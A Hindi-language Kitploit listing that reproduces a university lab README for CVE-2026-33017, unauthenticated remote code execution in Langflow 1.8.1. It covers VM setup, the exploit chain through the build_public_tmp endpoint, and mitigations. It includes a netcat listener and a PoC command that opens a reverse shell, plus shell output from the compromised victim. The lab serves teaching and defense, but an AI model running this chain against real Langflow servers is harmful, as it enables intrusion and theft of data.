Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-33017 — शैक्षिक लैब जो CVE-2026-33017 के माध्यम से Langflow में बिना प्रमाणीकरण के RCE प्रदर्शित करती है, जिसमें स्वचालित VM सेटअप और रिवर्स शेल के लिए PoC एक्सप्लॉइट शामिल है। | Kitploit
उपकरण/GitHubGitHub/jorrit-vm/cve-2026-33017
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंटलैब और अभ्यास
GitHubjorrit-vm/cve-2026-33017

CVE-2026-33017

शैक्षिक लैब जो CVE-2026-33017 के माध्यम से Langflow में बिना प्रमाणीकरण के RCE प्रदर्शित करती है, जिसमें स्वचालित VM सेटअप और रिवर्स शेल के लिए PoC एक्सप्लॉइट शामिल है।

13 महीने पहलेअभी तक समीक्षित नहीं
रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-33017 — Langflow अनप्रमाणित RCE

HoGent CyberSecurity II — नेटवर्क पेंटेस्टिंग और एक्सप्लॉइटेशन (NPE)
शैक्षणिक वर्ष 2025–2026

CVE CVSS Langflow


अवलोकन

इस रिपॉजिटरी में CVE-2026-33017 के लिए एक पूर्ण लैब वातावरण और एक्सप्लॉइटेशन प्रदर्शन शामिल है, जो Langflow ≤ 1.8.1 में एक गंभीर अनप्रमाणित Remote Code Execution (RCE) भेद्यता है।

बिना किसी प्रमाणीकरण के एक हमलावर /api/v1/build_public_tmp/{flow_id}/flow एंडपॉइंट के माध्यम से सर्वर पर मनमाना Python कोड निष्पादित कर सकता है, क्योंकि उपयोगकर्ता इनपुट बिना सैंडबॉक्सिंग या सत्यापन के सीधे Python के exec() को दिया जाता है।

⚠️ अस्वीकरण: यह रिपॉजिटरी केवल नियंत्रित लैब वातावरण में शैक्षिक उद्देश्यों के लिए है। केवल उन सिस्टमों पर उपयोग करें जिनके लिए आपके पास स्पष्ट अनुमति है।


आर्किटेक्चर

root@kitploit:~
┌─────────────────────────────────────────────────────┐
│                   HOST MACHINE                      │
│                                                     │
│  ┌──────────────────┐     ┌───────────────────────┐ │
│  │  Langflow-Victim │     │    Kali-Attacker      │ │
│  │  Ubuntu 22.04    │     │    Kali Linux         │ │
│  │  192.168.56.101  │◄────│    192.168.56.100     │ │
│  │  Langflow 1.8.1  │     │    PoC exploit tool   │ │
│  │  port 7860       │     │    + internet (NAT)   │ │
│  └──────────────────┘     └───────────────────────┘ │
│          Host-only netwerk: 192.168.56.0/24         │
└─────────────────────────────────────────────────────┘

रिपॉजिटरी संरचना

root@kitploit:~
CVE-2026-33017/
├── README.md # यह फ़ाइल
├── LICENSE
├── .gitignore
├── docs/
│ └── stappenplan.md # पूर्ण डिप्लॉयमेंट और हमला गाइड
└── scripts/
├── setup_vms.sh # चरण 1: VirtualBox VMs बनाएं (HOST)
├── setup_victim.sh # चरण 2: Langflow 1.8.1 इंस्टॉल करें (Ubuntu VM)
└── setup_attacker.sh # चरण 3: PoC टूल इंस्टॉल करें (Kali VM)

त्वरित प्रारंभ

आवश्यकताएँ

  • PATH में VBoxManage के साथ VirtualBox 7.x
  • Ubuntu_22.04-VB-64bit.vdi → नाम बदलकर ubuntu-22.04.vdi करें
  • Kali_Linux-VB-64bit.vdi → नाम बदलकर kali-linux.vdi करें
  • दोनों VDI फ़ाइलें setup_vms.sh के समान फ़ोल्डर में हों

चरण 1 — VMs बनाएं (होस्ट पर)

root@kitploit:~
bash scripts/setup_vms.sh

चरण 2 — Victim VM कॉन्फ़िगर करें (Ubuntu VM पर)

root@kitploit:~
# लॉगिन क्रेडेंशियल: osboxes / osboxes.org
sudo bash scripts/setup_victim.sh

चरण 3 — Attacker VM कॉन्फ़िगर करें (Kali VM पर)

root@kitploit:~
# लॉगिन क्रेडेंशियल: osboxes / osboxes.org
sudo bash scripts/setup_attacker.sh

हमला निष्पादित करें

टर्मिनल 1 — Reverse shell लिसनर:

root@kitploit:~
nc -lvnp 4444

टर्मिनल 2 — एक्सप्लॉइट:

root@kitploit:~
cd ~/CVE-2026-33017-Langflow-RCE-PoC
source venv/bin/activate
python3 cve-2026-33017.py 192.168.56.101 --shell \
  --lhost 192.168.56.100 --lport 4444

PoC स्वचालित रूप से setup_attacker.sh द्वारा इंस्टॉल किया जाता है।
उपयोग किया गया PoC: omer-efe-curkus/CVE-2026-33017-Langflow-RCE-PoC


एक्सप्लॉइट कैसे काम करता है

चरणएंडपॉइंटविवरण
1GET /api/v1/auto_loginसुपरयूज़र JWT-टोकन प्राप्त करता है (AUTO_LOGIN=true)
2POST /api/v1/flows/API के माध्यम से नया सार्वजनिक flow बनाता है
3POST /api/v1/build_public_tmp/{id}/flowदुर्भावनापूर्ण Python कोड के साथ CustomComponent इंजेक्ट करता है
4exec() in validate.py:397कोड बिना सैंडबॉक्सिंग के निष्पादित होता है — RCE

निष्पादन का प्रमाण

[] Fetching access token... [+] Public Flow ID created: 11571add-6416-4226-b8e6-844202cce6ff [] Sending reverse shell to connect back to 192.168.56.100:4444

Listener (Terminal 1): connect to [192.168.56.100] from (UNKNOWN) [192.168.56.101] 36160 $ whoami user $ hostname e37190a2f147 $ find /app -name "*.db" /app/.venv/lib/python3.12/site-packages/langflow/langflow.db


शमन

  • Langflow ≥ 1.9.0 में अपडेट करें — कमजोर data पैरामीटर को हटाता है
  • प्रोडक्शन में LANGFLOW_AUTO_LOGIN बंद करें
  • फ़ायरवॉल के माध्यम से पोर्ट 7860 तक नेटवर्क पहुंच सीमित करें
  • Langflow को प्रमाणित करने वाले reverse proxy के पीछे रखें

संदर्भ

  • NVD — CVE-2026-33017
  • GitHub Advisory GHSA-vwmf-pq79-vjvx
  • Sysdig — 20 घंटे में एक्सप्लॉइटेड
  • SonicWall — तकनीकी विश्लेषण
  • omer-efe-curkus द्वारा PoC

HoGent — एप्लाइड इंफॉर्मेटिक्स — CyberSecurity II — 2025–2026

टूल डाउनलोड करें